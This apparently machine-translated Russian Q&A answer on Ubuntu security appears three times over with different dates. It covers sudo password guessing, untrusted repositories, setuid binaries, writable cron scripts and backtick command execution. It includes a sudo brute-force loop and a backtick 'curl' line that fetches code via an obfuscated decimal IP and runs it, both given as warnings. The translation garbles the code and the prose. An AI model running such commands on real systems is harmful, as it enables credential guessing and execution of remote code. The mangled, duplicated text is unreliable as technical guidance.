ответ дан 6 August 2018 в 03:59

Не удалось взломать пароль root, потому что Ubuntu по умолчанию отключил пользователя root. Однако, если ваш пользователь может стать root через sudo, и ваш пароль легко угадать / перебор, у вас есть небезопасная система. Пример скрипта, пытающегося проверить пароль:

  #! / Bin / sh для пароля pass 123 ubuntu pass;  do echo $ pass | sudo -S evil_command done  

Добавление ненадежного репозитория позволяет устанавливать программы из этого репозитория. Даже если вы явно не устанавливаете такое приложение, как sudo apt-get install [app-from-repo] , репозиторий может по-прежнему влиять на другие программы, заставляя Ubuntu полагать, что репозиторий содержит более новую версию определенная программа.

Процесс обновления запускается как root, иначе файлы не могут быть записаны в / usr / bin или / etc . Триггер установки запускается также как root и может запускать произвольно и, возможно, вредоносные команды. Теперь не волнуйтесь, для обновления программ необходимы ручные действия, и хранилища Ubuntu безопасны. Программное обеспечение с закрытым исходным кодом, такое как Windows, никогда не может быть полностью доверено, потому что вы не можете проверить источник для вредоносного кода, но вы можете просмотреть источник приложения Ubuntu, если вам нужно (не относится к проприетарным программам, таким как sun-java6 или Flash).

Как уже упоминалось Хавьером Риверой, ошибки ядра могут привести к произвольному выполнению кода, но опасное программное обеспечение также опасно, особенно глючные setsuid корневые двоичные файлы ( двоичные файлы, которые будут выполняться под владельцем файла, root) и другими багги-программами, запущенными как root.

Вы можете создать дыры в системе, если не обратите внимание на то, что вы делаете. Например, без полного понимания концепции cronjobs вы добавили cronjob в /etc/cron.daily , который запускает программу в вашей домашней папке (например, / bin / sh / home /your-username/myscript.sh. Если файл myscript.sh доступен для записи, вы можете быть удалены вами, эксплойт может поместить вредоносный код в myscript.sh , который будет запущен

Чтобы оставаться в безопасности, используйте свой ум! Не запускайте команды из ненадежных источников, если вы не знаете, что он делает. Если кто-то говорит, что запустите `curl 3221233674` [ ! d10] с back-ticks, нет. 3221233674 - это еще один способ записи 192.0.32.10 (IP example.com). Таким образом, он будет равен:

   `curl http: // example.com /`  

Эти обратные тики заставляют вывод выполнять как команды оболочки. На простом английском языке «Загрузите страницу http : //example.com/ и попытайтесь выполнить загруженную страницу ".

Сначала вы не увидите что-то злонамеренное в данной команде. Но теперь вы знаете, что это тоже можно злоупотреблять.

Всегда проверяйте команды / сценарий, которые вы получаете из ненадежных источников, таких как Интернет.

15
ответ дан 7 August 2018 в 21:56

Не удалось взломать пароль root, потому что Ubuntu по умолчанию отключил пользователя root. Однако, если ваш пользователь может стать root через sudo, и ваш пароль легко угадать / перебор, у вас есть небезопасная система. Пример скрипта, пытающегося проверить пароль:

  #! / Bin / sh для пароля pass 123 ubuntu pass;  do echo $ pass | sudo -S evil_command done  

Добавление ненадежного репозитория позволяет устанавливать программы из этого репозитория. Даже если вы явно не устанавливаете такое приложение, как sudo apt-get install [app-from-repo] , репозиторий может по-прежнему влиять на другие программы, заставляя Ubuntu полагать, что репозиторий содержит более новую версию определенная программа.

Процесс обновления запускается как root, иначе файлы не могут быть записаны в / usr / bin или / etc . Триггер установки запускается также как root и может запускать произвольно и, возможно, вредоносные команды. Теперь не волнуйтесь, для обновления программ необходимы ручные действия, и хранилища Ubuntu безопасны. Программное обеспечение с закрытым исходным кодом, такое как Windows, никогда не может быть полностью доверено, потому что вы не можете проверить источник для вредоносного кода, но вы можете просмотреть источник приложения Ubuntu, если вам нужно (не относится к проприетарным программам, таким как sun-java6 или Flash).

Как уже упоминалось Хавьером Риверой, ошибки ядра могут привести к произвольному выполнению кода, но опасное программное обеспечение также опасно, особенно глючные setsuid корневые двоичные файлы ( двоичные файлы, которые будут выполняться под владельцем файла, root) и другими багги-программами, запущенными как root.

Вы можете создать дыры в системе, если не обратите внимание на то, что вы делаете. Например, без полного понимания концепции cronjobs вы добавили cronjob в /etc/cron.daily , который запускает программу в вашей домашней папке (например, / bin / sh / home /your-username/myscript.sh. Если файл myscript.sh доступен для записи, вы можете быть удалены вами, эксплойт может поместить вредоносный код в myscript.sh , который будет запущен

Чтобы оставаться в безопасности, используйте свой ум! Не запускайте команды из ненадежных источников, если вы не знаете, что он делает. Если кто-то говорит, что запустите `curl 3221233674` [ ! d10] с back-ticks, нет. 3221233674 - это еще один способ записи 192.0.32.10 (IP example.com). Таким образом, он будет равен:

   `curl http: // example.com /`  

Эти обратные тики заставляют вывод выполнять как команды оболочки. На простом английском языке «Загрузите страницу http : //example.com/ и попытайтесь выполнить загруженную страницу ".

Сначала вы не увидите что-то злонамеренное в данной команде. Но теперь вы знаете, что это тоже можно злоупотреблять.

Всегда проверяйте команды / сценарий, которые вы получаете из ненадежных источников, таких как Интернет.

15
ответ дан 10 August 2018 в 10:11

Не удалось взломать пароль root, потому что Ubuntu по умолчанию отключил пользователя root. Однако, если ваш пользователь может стать root через sudo, и ваш пароль легко угадать / перебор, у вас есть небезопасная система. Пример скрипта, пытающегося проверить пароль:

  #! / Bin / sh для пароля pass 123 ubuntu pass;  do echo $ pass | sudo -S evil_command done  

Добавление ненадежного репозитория позволяет устанавливать программы из этого репозитория. Даже если вы явно не устанавливаете такое приложение, как sudo apt-get install [app-from-repo] , репозиторий может по-прежнему влиять на другие программы, заставляя Ubuntu полагать, что репозиторий содержит более новую версию определенная программа.

Процесс обновления запускается как root, иначе файлы не могут быть записаны в / usr / bin или / etc . Триггер установки запускается также как root и может запускать произвольно и, возможно, вредоносные команды. Теперь не волнуйтесь, для обновления программ необходимы ручные действия, и хранилища Ubuntu безопасны. Программное обеспечение с закрытым исходным кодом, такое как Windows, никогда не может быть полностью доверено, потому что вы не можете проверить источник для вредоносного кода, но вы можете просмотреть источник приложения Ubuntu, если вам нужно (не относится к проприетарным программам, таким как sun-java6 или Flash).

Как уже упоминалось Хавьером Риверой, ошибки ядра могут привести к произвольному выполнению кода, но опасное программное обеспечение также опасно, особенно глючные setsuid корневые двоичные файлы ( двоичные файлы, которые будут выполняться под владельцем файла, root) и другими багги-программами, запущенными как root.

Вы можете создать дыры в системе, если не обратите внимание на то, что вы делаете. Например, без полного понимания концепции cronjobs вы добавили cronjob в /etc/cron.daily , который запускает программу в вашей домашней папке (например, / bin / sh / home /your-username/myscript.sh. Если файл myscript.sh доступен для записи, вы можете быть удалены вами, эксплойт может поместить вредоносный код в myscript.sh , который будет запущен

Чтобы оставаться в безопасности, используйте свой ум! Не запускайте команды из ненадежных источников, если вы не знаете, что он делает. Если кто-то говорит, что запустите `curl 3221233674` [ ! d10] с back-ticks, нет. 3221233674 - это еще один способ записи 192.0.32.10 (IP example.com). Таким образом, он будет равен:

   `curl http: // example.com /`  

Эти обратные тики заставляют вывод выполнять как команды оболочки. На простом английском языке «Загрузите страницу http : //example.com/ и попытайтесь выполнить загруженную страницу ".

Сначала вы не увидите что-то злонамеренное в данной команде. Но теперь вы знаете, что это тоже можно злоупотреблять.

Всегда проверяйте команды / сценарий, которые вы получаете из ненадежных источников, таких как Интернет.

15
ответ дан 13 August 2018 в 16:32

Другие вопросы по тегам:

Похожие вопросы: